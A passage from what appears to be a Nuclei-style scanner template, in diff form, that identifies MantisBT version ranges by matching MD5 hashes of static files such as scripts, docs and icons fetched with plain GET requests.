type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"644476df73032b063a33b199a3003fd8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/controls.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"78a3557031d104d09e8429350bf69575\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/javascript/dev/jscalendar/lang/calendar-en.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"46811ee79796d2345bea2308475d1ec9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/jscalendar/calendar.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"752290970024c54c4b41a3145e3e0bce\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/jscalendar/calendar-blue.css" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"7c561519a1cf3a882e27d1b9814888d4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/jscalendar/calendar-setup.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"e8fa1ddbee7987135472abefa8132693\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/time_tracking_stopwatch.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"19af4f932c37186c750b644fdfc2e5d8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/ajax.js" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"f0d344ccfd41296ba7863529535a1c05\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"f7bb7a98908c339868cf8afd94e77157\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"262af3ff0b422b7140f65b5e950fc326\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"dded62088ca97fbe92e76d2b191230bb\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"cf93193fdb19340b2abec3339a41cb13\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/xmlhttprequest.js" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"924dfb284c6b096ca9251dd7ca49569c\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"e4410a0f1d0e5a5335e0a3e88a6c46e6\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"51a4d09bf77643e51b5823a4336895c1\" == md5(body))" + - type: dsl + name: 1.2.17 
- 1.2.20 + dsl: + - "(\"952263942c0997e2c15e0457a4f3f33c\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"bbf3fbb8068df16f0901334953df3625\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/dynamic_filters.js" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"d7fb2a1ed2d163f7137d368b6b4a77ee\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"68304ec3e9e322b1672cbae412bb1eed\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"c477e0e7dcdf9ef3be17aa71135630dc\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5db8bc2031ac54f300b46ab22871e1cb\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"ee4ee4e8902e612f5721845b27273683\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/CUSTOMIZATION" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"69ed7d7b096557122c1b5e7817ed9187\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"fb5eed653dc8a0269228021690f93de9\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"9a40b9f4b6213237958db2258a1b511b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"8a95c4bac722cd794e619e80a8dba49a\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"b1240a98523c88f9b793f6c63303de83\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"9236cf0c0221809bbcfff18c6c77e615\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"03245342745fe4a044fd2e18dc608a4f\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.5 + dsl: + - "(\"d6d0e727b9c9eeaf428ff5a3989d6f08\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/admin/admin.css" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"ed352d1826d9c69f69a55493ae7151a7\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.1.9 + dsl: + - "(\"bbd184dcfe906ea96aa8c84d62dc4716\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/docbook/template/Makefile" + + matchers: + - type: dsl + name: 1.2.7 - 1.2.20 + dsl: + - "(\"b389a203fa54197c83472034b2a83b93\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.6 + dsl: + - "(\"bdbe14a14039da0f3764dd6a9232860b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/template/chapter.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"668b74a870980313f9ca9cc911f02045\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/template/template.sgml" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"c71dc5406ca9f69b860c7b089f7226d1\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"c699033cdfb7a287a858a2fd9f3fcaa3\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"230d83d634a1b155b410e5dbdf702282\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"1499c35c2d45ae04ebfda958224f9524\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"5c0d378a62749da5f924d045a2184c70\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/template/stylesheet.css" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"35e977810bc6fa8b11b4f8c6dd6e7cf5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/template/file-entities.ent" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"e1c3a4aff2e0bd94167c3b25af2ca161\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/template/stylesheet.dsl" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"abd9f15781c41ec01ed386a46e31cff4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/integrators.sgml" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.20 + dsl: + - "(\"d6109aa0cd02433061331bea9e4f39c6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/event-reference-bug.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.11 + dsl: + - 
"(\"789ae9794b72a5cfb5d6e859e36a53b5\" == md5(body))" + - type: dsl + name: 1.2.12 - 1.2.20 + dsl: + - "(\"0d353c9756f97a3834d97bcc82ad30a6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/developers.sgml" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"e2748bd8fd249eb41eb88f8e22d796d6\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"391d00a19e96309aa15806ef1b43faec\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"3d0c60bcfd37c6bf225b051fc37d931e\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"a0290c0935ac9bdb31f34401af60abef\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"ea51d3d489cce0d5cf9f0cae5e66cd07\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/Makefile" + + matchers: + - type: dsl + name: 1.2.7 - 1.2.15 + dsl: + - "(\"3ac33befa28ae4366b733718bee7e126\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.6 + dsl: + - "(\"18d6d73c6795a241920f779da97563f0\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"54e4d30fbe8589422681182442dac0cc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/appendix.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"e9d6c068a8ed1abe41b468a25ea123fb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/plugins-building-source.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"645c4576a7445c96e1145ea5b0a0a504\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/database.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"b17dd9b5effb4b229e56aeed5bdc4520\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"b594792b1d736c60435cb5f9ca0e306f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/contributers.sgml" + + matchers: + - type: dsl + name: 1.2.6 - 1.2.15 
+ dsl: + - "(\"21c96efc1675c7331acac10ee4052eb3\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.5 + dsl: + - "(\"5ed2c4180ad2a4f3568b6173c402ef8c\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"9697b60be1ac11e17cbcae2edce84c65\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"2acfe92a8662fccbd8f565dadde74917\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/plugins-building.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"238875281a0e62e9a87269bb815e7af5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/file-entities.ent" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.20 + dsl: + - "(\"81e865039656fca103cdab244b20a36f\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.8 + dsl: + - "(\"a5c63951fd54afa34db3b5339bc6d1dc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/events.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"771c1f8d28e63cfe5214707b33e4f357\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/event-reference-filter.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"d5751664e41a79c67be6348f879a51bf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/event-reference-notify.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"dce82ad029a186c7f8289f6069f1a5f9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/plugins.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"9e2ddd16927c938ce32ff57434bf1b53\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/README" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.15 + dsl: + - "(\"d4e825abfad93dbd2a5286363868e986\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"7aa8917cb958a65447c5d684f09ccc20\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/docbook/adminguide/en/page_descriptions.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.10 + dsl: + - "(\"d2a41796705e0fd14ea660ca72652fe3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/Makefile" + + matchers: + - type: dsl + name: 1.2.7 - 1.2.10 + dsl: + - "(\"1ef4671f58e0f5e8e618543af45b2cf4\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.6 + dsl: + - "(\"7c296c5def3beac5ce972924b6fac829\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/project_management.sgml" + + matchers: + - type: dsl + name: 1.2.4 - 1.2.10 + dsl: + - "(\"79d8ce09a4cfdad0c3dab14f86dde4d3\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.3 + dsl: + - "(\"4bee948af824d0886d3a8dc9e7450418\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/user_management.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.10 + dsl: + - "(\"9898f7e63e46f44f4e8f6bbd2f0932fe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/workflow.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.10 + dsl: + - "(\"862957ebabe5dbc719d029bec5659369\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/authentication.sgml" + + matchers: + - type: dsl + name: 1.2.6 - 1.2.10 + dsl: + - "(\"50141a26d26acfd92e5dd99cd77d8047\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.5 + dsl: + - "(\"21226f78a94a6763ffaecb2f3d3de212\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/administration_guide.sgml" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"c4bc2ea427d728ea5b6e1ed4a938c882\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"010eff7b8ff9852029621b62e538464b\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"c3ce9ad3c175a8ee4e1fa52b7818b18f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/file-entities.ent" + + matchers: + - type: dsl + 
name: 1.2.0 - 1.2.10 + dsl: + - "(\"05becfb68387aad85228e6aef09cd6ba\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/installation.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.10 + dsl: + - "(\"fa17bba464761637cabe3c11e62f5513\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/contributing.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.10 + dsl: + - "(\"7eca1a0d02dd400081050a7f1397255e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/customizing_mantis.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.10 + dsl: + - "(\"1ea3feac2fa52a53d2f330a3d5a07de7\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/adminguide/en/about.sgml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.10 + dsl: + - "(\"58a5a80735b83b5ba3b8352b2bc7726a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/build.xml" + + matchers: + - type: dsl + name: 1.2.7 - 1.2.20 + dsl: + - "(\"90e4a9acc1a738d805f4f51dee088cbf\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.6 + dsl: + - "(\"da1ea1cebab683fadfb4a0d9a9be48d1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/ezc/Makefile" + + matchers: + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"9f71a5c571ce306126a4d8664c2eaa50\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/ie.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"800d2395bd737075d8e67779d304d3e5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/priority_low_3.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"0f43345070da1403d4adcf3ddf7c87d2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/dollars.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"6fc74458f291407bc3e504d313b9b075\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/priority_normal.gif" + + matchers: + - type: dsl + name: 1.2.0 - 1.3.20 + 
dsl: + - "(\"e5152b80ee76e25679f810536067fbb0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/minus.png" + + matchers: + - type: dsl + name: 1.2.9 - 1.3.20 + dsl: + - "(\"d2b6371450be3211332ed12015da2592\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.2.8 + dsl: + - "(\"b323f1eb57100ca529be46a51b453406\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/priority_1.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"34eb51f026f5c827462aa1f8acedefc1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/protected.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"8e5ab56d1413fe3e1cd3c0a6d1a15e54\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/calendar-img.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"c1e5255bd358fcd5a0779a0cc310a2fe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/text.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"f3fa1d34ae216911d245672e3db9235b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/doc.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"31f4faaa0dd89d7f28fcf1ba068437f3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/xlt.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"042a3df7803993ffbe7ef998f27b3340\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/css.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"7b67911906d4ddd3aea8b76c5b88c3b6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/xls.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"d8b116d5a73fb9576799264d6a073396\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/vsd.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"6ab21bd81939304b406e3b7ef20ddd15\" == md5(body))" 
+ + - method: GET + path: + - "{{BaseURL}}/images/fileicons/generic.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"a8cde8384a414838f99be196e53ae039\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/eml.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"bf4b1d2d046d52fcd99fdad878cdebd3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/csv.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"e34fb7975ace474da255d36cbb495835\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/png.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"4c2b6a95930efc2a58c99c87aca61851\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/html.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"338ca0065c22f2a9f699a46c5bf1e7ab\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/pot.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"48c9bdd29e767862dc3b7e395628cb64\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/reg.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"f88d438d411d90e7110017640704c278\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/pub.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"4d964954644c901a851118904070aa2d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/vst.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"7edb963e5addbfae478ee524455492be\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/pdf.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"9cb8ae8481d24743d57e81a2280ffaae\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/mhtml.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - 
"(\"220331690a42d855157a50e634d42835\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/jpg.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"330542d19122885a098aec151a68609a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/unknown.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"b7ea9920fbf16b2d10b36b5d6c47a440\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/mov.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"6fcb0e622a8cef4a1f8f6c6ca4bfadb3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/xml.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"51e2f6426802e24b6714717e9ef7d2e0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/vsl.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"b8732343f4d52883c66ca056b4653fba\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/chm.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"df841fd2cfd2e48a98dba87328917d84\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/gif.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"b67bed81d8bbea1e5590547ef85e1aa0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/one.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"90ef7330debcc3876fdfa911f1584c15\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/pcx.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"d265f3e0fdd2704e6b9cf3f36a37e608\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/pps.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"0810422411d20b8b86edcf6f39e0a8dc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/zip.gif" + + matchers: + - 
type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"e47b673f360c57be8437841fdea7351c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/wbk.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"5b604a3720ebe9a7841839bd7ae7b13e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/wav.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"6d510113f7b70e42ae9348e70db1c688\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/mid.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"b42cfd563a3d58f03fb03731ac80dbd9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/wri.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"5794fdc184e601e4fa356d664fb095b0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/ppt.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"0388af2462a134559b884ff4a83e7c4f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicons/cpp.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.3.20 + dsl: + - "(\"7b06d75842a7b7682090a976eecb01aa\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/down.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"ea5126235fb9549dd9eda38f13120763\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/plus.png" + + matchers: + - type: dsl + name: 1.2.9 - 1.3.20 + dsl: + - "(\"423617ed0d546823d454457e4e6c3964\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.2.8 + dsl: + - "(\"3c4813c2af6298af8eaacab2f0bd7b58\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/attachment.png" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"16f808ec5ec9e0c9bb8fa2eca2e9eb9e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/update.png" + + matchers: + - type: dsl + name: 1.2.0 - 1.3.20 + dsl: + - 
"(\"8abfc1459e47d4740d51ffda5aa15db9\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.1.9 + dsl: + - "(\"b468d7b908c65221d28ab60602aa8df4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/unread.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"844092dc87a57454b4340151ce34eab1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/priority_low_1.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"d48d3b4cbb6eaff8d67a92d3243543e5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/delete.png" + + matchers: + - type: dsl + name: 1.2.0 - 1.3.20 + dsl: + - "(\"99cbf496a1b02408c433caf370135070\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"77dced4439c1dff30e11115c3ed5eb05\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/overdue.png" + + matchers: + - type: dsl + name: 1.2.0 - 1.3.20 + dsl: + - "(\"0177c5c4700cb9b15b1be97d857f1f07\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/mantis_space.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"fc94fb0c3ed8a8f909dbc7630a0987ff\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/synthgraph.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"6d514201e6a3b228d03db5c225b94e13\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/notice.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"dbea94265feab792f2e6f40fa59a8840\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/synthese.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"d8e2fe21511633ee17cc24dc1cc32e1a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/priority_2.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"5ad19e3fd60a8dc8fff09b4e2a389ca8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/up.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: 
+ - "(\"c4b122aa0ac4d26711015e1bad776711\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/ok.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"c45416c024be84848dfb616e3b4298d3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/blank.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"a5335c41b20b47e0044ff3e51b60db9c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/rss.png" + + matchers: + - type: dsl + name: 1.2.0 - 1.3.20 + dsl: + - "(\"0f895c0709b7938a8aaeb72e61471cad\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/priority_3.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"a488f63cc6a3f833f757fd6550b4c97a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/clock.png" + + matchers: + - type: dsl + name: 1.2.0 - 1.3.20 + dsl: + - "(\"f1cabcee8d06aecc2dd8a9dd5b43549e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/priority_low_2.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.3.20 + dsl: + - "(\"511695b74ff1aee9a7de872bd5529d2b\" == md5(body))" + + - method: GET 